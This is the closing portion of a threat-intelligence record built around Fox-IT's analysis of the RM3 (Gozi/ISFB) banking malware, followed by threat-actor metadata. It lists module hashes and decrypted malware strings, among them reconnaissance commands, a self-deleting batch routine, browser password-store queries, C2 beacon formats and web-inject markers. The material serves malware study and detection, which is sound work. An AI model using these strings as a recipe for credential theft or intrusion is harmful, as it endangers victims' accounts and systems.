?\r\n86b670d81a26ea394f7c0edebdc93e8f9bd6ce6e0a8d650e32a0fe36c93f0dee - GoziAT/ISFB RM2\r\nIoCs – Modules\r\nb15c3b93f8de40b745eb1c1df5dcdee3371ba08a1a124c7f20897f87f23bcd55 loader.exe (Build 300932)\r\nce4fc5dcab919ea40e7915646a3ce345a39a3f81c33758f1ba9c1eae577a5c35 loader.dll (Build 300932)\r\nba0e9cb3bf25516e2c1f0288e988bd7bd538d275373d36cee28c34dafa7bbd1f explorer.dll (Build 300932)\r\naccb76e6190358760044d4708e214e546f87b1e644f7e411ba1a67900bcd32a1 bl.dll (Build 300932)\r\nf90ed3d7c437673c3cfa3db8e6fbb3370584914def2c0c2ce1f11f90f199fb4f netwrk.dll (Build 
300932)\r\n38c9aff9736eae6db5b0d9456ad13d1632b134d654c037fba43086b5816acd58 rt.dll (Build 300932)\r\n2c7cdcf0f9c2930096a561ac6f9c353388a06c339f27f70696d0006687acad5b browser.dll (Build 300932)\r\n34517a7c78dd66326d0d8fbb2d1524592bbbedb8ed6b595281f7bb3d6a39bc0a chrome.dll (Build 300932)\r\n59670730341477b0a254ddbfc10df6f1fcd3471a08c0d8ec20e1aa0c560ddee4 firefox.dll (Build 300932)\r\nd927f8793f537b94c6d2299f86fe36e3f751c94edca5cd3ddcdbd65d9143b2b6 iexplore.dll (Build 300932)\r\n199caec535d640c400d3c6b35806c74912b832ff78cb31fd90fe4712ed194b09 microsoftedgecp.dll (Build 300932)\r\n13635b2582a11e658ab0b959611590005b81178365c12062e77274db1d0b4f0c msedge.dll (Build 300932)\r\n65a1923e037bce4816ac2654c242921f3e3592e972495945849f155ca69c05e5 loader.dll (Build 300960)\r\nd1f5ef94e14488bf909057e4a0d081ff18dd0ac86f53c42f53b12ea25cdcfe76 cmdshell.dll (Build 300869)\r\n820faca1f9e6e291240e97e5768030e1574b60862d5fce7f6ba519aaa3dbe880 vnc.dll (Build 300869)\r\nShellcode – startup module – bss decrypted\r\nWindows Security\r\nNTDLL.DLL\r\nRtlExitUserProcess\r\nKERNEL32.DLL\r\nbl.dll - bss decrypted\r\nMicrosoft Windows\r\nKERNEL32.DLL\r\nADVAPI32.DLL\r\nNTDLL.DLL\r\nKERNELBASE\r\nUSER32\r\nLdrUnregisterDllNotification\r\nResolveDelayLoadsFromDll\r\nSoftware\r\nWow64EnableWow64FsRedirection\r\n\\REGISTRY\\USER\\%s\\%s\\\r\n{%08X-%04X-%04X-%04X-%08X%04X}\r\nSetThreadInformation\r\nGetWindowThreadProcessId\r\n%08X-%04X-%04X-%04X-%08X%04X\r\nRtlExitUserThread\r\nS-%u-%u\r\n-%u\r\nLocal\\\r\n\\\\.\\pipe\\\r\n%05u\r\nLdrRegisterDllNotification\r\nNtClose\r\nZwProtectVirtualMemory\r\nLdrGetProcedureAddress\r\nWaitNamedPipeW\r\nCallNamedPipeW\r\nLdrLoadDll\r\nNtCreateUserProcess\r\n.dll\r\n%08x\r\nGetShellWindow\r\n\\KnownDlls\\ntdll.dll\r\n%systemroot%\\system32\\c_1252.NLS\r\n\\??\\\r\n\\\\?\\\r\nexplorer.dll – bss decrypted\r\nWindows 
Security\r\n.jpeg\r\nMain\r\n.gif\r\n.bmp\r\n%APPDATA%\\Microsoft\\\r\ntasklist.exe /SVC\r\n\\Microsoft\\Windows\\\r\ncmd /C \"%s\" \u003e\u003e %S0\r\nsysteminfo.exe\r\ndriverquery.exe\r\nnet view\r\nnslookup 127.0.0.1\r\nwhoami /all\r\nnet localgroup administrators\r\nnet group \"domain computers\" /domain\r\nreg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s\r\ncmd /U /C \"type %S0 \u003e %S \u0026 del %S0\"\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 45 of 52\n\necho -------- %u\r\nKERNELBASE\r\n.exe\r\nRegGetValueW\r\n0x%S\r\n.DLL\r\nDllRegisterServer\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Serialize\r\n0x%X,%c%c\r\nStartupdelayinmsec\r\nICGetInfo\r\nSOFTWARE\\Classes\\Chrome\r\nDelegateExecute\r\n\\\\?\\\r\n%userprofile%\\appdata\\local\\google\\chrome\\user data\\default\\cache\r\n\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nhttp\\shell\\open\\command\r\nICSendMessage\r\n%08x\r\n | \"%s\" | %u\r\nmsvfw32\r\nICOpen\r\nICClose\r\nICInfo\r\nmain\r\n%userprofile%\\AppData\\Local\\Mozilla\\Firefox\\Profiles\r\n.avi\r\nhttps://\r\nVideo: sec=%u, fps=%u, q=%u\r\nLocal\\\r\n%userprofile%\\appdata\\local\\microsoft\\edge\\user data\\default\\cache\r\nMiniDumpWriteDump\r\ncache2\\entries\\*.*\r\n%PROGRAMFILES%\\Mozilla Firefox\r\n%USERPROFILE%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default*\r\nSoftware\\Classes\\CLSID\\%s\\InProcServer32\r\nopen\r\nhttp://\r\nfile://\r\nDBGHELP.DLL\r\n%temp%\\rm3.dmp\r\n%u, 0x%x, \"%S\"\r\n\"%S\", 0x%p, 0x%x\r\n%APPDATA%\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\r\nInstallDate\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 46 of 52\n\nrt.dll – bss decrypted\r\nWindows Security\r\n%s%02u:%02u:%02u\r\n:%u\r\nattrib -h -r -s %%1\r\ndel %%1\r\nif exist %%1 goto %u\r\ndel 
%%0\r\nLow\\\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n|$$$}rstuvwxyz{$$$$$$$\u003e?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\]^_`abcdefghijklmnopq\r\n*.*\r\n.bin\r\nopen\r\n%02u-%02u-%02u %02u:%02u:%02u\r\n*.dll\r\n%systemroot%\\system32\\c_1252.NLS\r\nrundll32 \"%s\",%S %s\r\n\"%s\"\r\ncmd /C regsvr32 \"%s\"\r\nMb=Lk\r\nAuthor\r\nn;\r\nQkkXa\r\nM\u003cq\r\nnetwrk.dll – bss decrypted\r\n\u0026WP\r\nPOST\r\nHost\r\n%04x%04x\r\nGET\r\nWindows Security\r\nContent-Type: multipart/form-data; boundary=%s\r\nContent-Type: application/octet-stream\r\n--%s\r\n--%s--\r\n%c%02X\r\nhttps://\r\nhttp://\r\n%08x%08x%08x%08x\r\nform\r\n%s=%s\u0026\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 47 of 52\n\n/images/\r\n.bmp\r\nfile://\r\ntype=%u\u0026soft=%u\u0026version=%u\u0026user=%08x%08x%08x%08x\u0026group=%u\u0026id=%08x\u0026arc=%u\u0026crc=%08x\u0026size=%u\u0026uptime=%u\r\nindex.html\r\nContent-Disposition: form-data; name=\"%s\"\r\n; filename=\"%s\"\r\n\u0026os=%u.%u_%u_%u_x%u\r\n\u0026ip=%s\r\nMozilla/5.0 (Windows NT %u.%u%s; Trident/7.0; rv:11.0) like Gecko\r\n; Win64; x64\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n%08x\r\n|$$$}rstuvwxyz{$$$$$$$\u003e?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\]^_`abcdefghijklmnopq\r\nF%D,3\r\noverridelink\r\ninvalidcert\r\n9*.onion\r\n\u0026sysid=%08x%08x%08x%08x\r\nbrowser.dll – bss decrypted\r\n%c%02X\r\n.php\r\nWindows Security\r\n1.3.6.1.5.5.7.3.2\r\n1.3.6.1.5.5.7.3.1\r\n2.5.29.15\r\n2.5.29.37\r\n2.5.29.1\r\n2.5.29.35\r\n2.5.29.14\r\n2.5.29.10\r\n2.5.29.19\r\n1.3.6.1.5.5.7.1.1\r\n2.5.29.32\r\n1.3.6.1.5.5.7.1.11\r\n1.3.6.1.5.5.7\r\n1.3.6.1.5.5.7.1\r\n2.5.29.31\r\n1.2.840.113549.1.1.11\r\n1.2.840.113549.1.1.5\r\nWS2_32.dll\r\niexplore.hlp\r\nConnectEx\r\nLocal\\\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 48 of 
52\n\nWSOCK32.DLL\r\nWININET.DLL\r\nCRYPT32.DLL\r\nsocket\r\nconnect\r\nclosesocket\r\ngetpeername\r\nWSAStartup\r\nWSACleanup\r\nWSAIoctl\r\nUser-Agent\r\nContent-Type\r\nContent-Length\r\nConnection\r\nContent-Security-Policy\r\nContent-Security-Policy-Report-Only\r\nX-Frame-Options\r\nAccess-Control-Allow-Origin\r\nchunked\r\nWebSocket\r\nTransfer-Encoding\r\nContent-Encoding\r\nAccept-Encoding\r\nAccept-Language\r\nCookie\r\nidentity\r\ngzip, deflate\r\ngzip\r\nHost\r\n://\r\nHTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n://\r\nHTTP/1.1 503 Service Unavailable\r\nContent-Length: 0\r\nhttp://\r\nhttps://\r\nReferer\r\nUpgrade\r\nCache-Control\r\nLast-Modified\r\nEtag\r\nno-cache, no-store, must-revalidate\r\nocsp\r\nTEXT HTML JSON JAVASCRIPT\r\nSECUR32.DLL\r\nSECURITY.DLL\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 49 of 52\n\nInitSecurityInterfaceW\r\nBUNNY\r\nSYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\r\nSendTrustedIssuerList\r\n@ID@\r\nURL=\r\nMain\r\n@RANDSTR@\r\nBlocked\r\n@GROUP@\r\nBLOCKCFG=\r\nLOADCFG=\r\nDELCFG=\r\nVIDEO=\r\nVNC=\r\nSOCKS=\r\nCFGON=\r\nCFGOFF=\r\nENCRYPT=\r\nhttp\r\n@%s@\r\nhttp\r\ngrabs=\r\nPOST\r\nPUT\r\nGET\r\nHEAD\r\nOPTIONS\r\nURL: %s\r\nREF: %s\r\nLANG: %s\r\nAGENT: %s\r\nCOOKIE: %s\r\nPOST:\r\nUSER: %s\r\nUSERID: %s\r\n@*@\r\n***\r\nIE:\r\n:Microsoft Unified Security Protocol Provider\r\nFF:\r\nCR:\r\nED:\r\niexplore\r\nfirefox\r\nchrome\r\nedge\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 50 of 52\n\nInitRecv %u, %s%s\r\nCompleteRecv %u, %s%s\r\nLoadUrl %u, %s\r\nNEWGRAB\r\nCertGetCertificateChain\r\nCertVerifyCertificateChainPolicy\r\nNSS_Init\r\nNSS_Shutdown\r\nnss3.dll\r\nPK11_GetInternalKeySlot\r\nPK11_FreeSlot\r\nPK11_Authenticate\r\nPK11SDR_Decrypt\r\nhostname\r\nvaultcli\r\n%PROGRAMFILES%\\Mozilla 
Thunderbird\r\nencryptedUsername\r\n%USERPROFILE%\\AppData\\Roaming\\Thunderbird\\Profiles\\*.default\r\nencryptedPassword\r\nlogins.json\r\n%systemroot%\\syswow64\\svchost.exe\r\nSoftware\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2\r\nFindCloseUrlCache\r\nVaultEnumerateItems\r\ntype=%s, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s\r\nFindNextUrlCacheEntryW\r\nFindFirstUrlCacheEntryW\r\nDeleteUrlCacheEntryW\r\nVaultEnumerateVaults\r\nVaultOpenVault\r\nVaultCloseVault\r\nVaultFree\r\nVaultGetItem\r\nc:\\test\\sqlite3.dll\r\nSELECT origin_url, username_value, password_value FROM logins\r\nencrypted_key\":\"\r\ndefault\\login data\r\nBCryptSetProperty\r\n%userprofile%\\appdata\\local\\google\\chrome\\user data\r\nlocal state\r\nDPAPI\r\nv10\r\nBCryptDecrypt\r\nAES\r\nMicrosoft Primitive Provider\r\nBCryptDestroyKey\r\nBCryptCloseAlgorithmProvider\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 51 of 52\n\nChainingModeGCM\r\nBCryptOpenAlgorithmProvider\r\nBCryptGenerateSymmetricKey\r\nBCRYPT\r\n%userprofile%\\appData\\local\\microsoft\\edge\\user data\r\nSource: https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 52 of 52",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/"
	],
	"report_names": [
		"rm3-curiosities-of-the-wildest-banking-malware"
	],
	"threat_actors": [
		{
			"id": "1998ad13-b343-4409-9a37-b1930d156a28",
			"created_at": "2023-09-17T02:00:09.948891Z",
			"updated_at": "2026-04-10T02:00:03.372224Z",
			"deleted_at": null,
			"main_name": "Storm-0324",
			"aliases": [
				"DEV-0324",
				"Sagrid",
				"TA543"
			],
			"source_name": "MISPGALAXY:Storm-0324",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438994,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2a6ddec1042a190564dae5c5d5fcbd5f120564c0.pdf",
		"text": "https://archive.orkl.eu/2a6ddec1042a190564dae5c5d5fcbd5f120564c0.txt",
		"img": "https://archive.orkl.eu/2a6ddec1042a190564dae5c5d5fcbd5f120564c0.jpg"
	}
}